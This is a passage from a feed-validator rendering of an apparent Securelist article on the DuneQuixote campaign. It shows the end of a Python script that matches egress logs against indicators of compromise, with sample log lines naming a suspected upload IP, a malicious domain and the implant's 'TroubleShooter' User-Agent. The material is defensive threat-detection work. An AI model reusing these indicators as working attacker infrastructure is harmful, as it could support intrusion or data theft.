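    '2024-01-12T09:14:05Z 10.0.0.25 GET https://www.example.com/ "Mozilla/5.0 (Windows NT 10.0)" 200',
    '2024-01-12T09:15:11Z 10.0.0.31 POST http://104.36.229.249/upload "Mozilla/5.0 (Windows NT 10.0)" 200',
    '2024-01-12T09:16:40Z 10.0.0.42 GET https://service.userfeedsync.com/ "TroubleShooter" 404',
]

if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["host"], "|", "; ".join(hit["reasons"]))
```

<p>The User-Agent match is the more durable of the three signals: the domains and IPs can be rotated cheaply, while the hardcoded &#8220;TroubleShooter&#8221; string is baked into the implant. It is also the one that can be applied to any egress log that records User-Agent headers, not only to logs that include the destination.</p>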
  1758. ]]></content:encoded>
  1759. <wfw:commentRss>https://securelist.com/dunequixote/112425/feed/</wfw:commentRss>
  1760. <slash:comments>0</slash:comments>
  1761. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured.jpg" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
  1762. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1763. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-300x189.jpg" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
  1764. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1765. </item>
  1766. </channel>
  1767. </rss>
  1768.  


http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda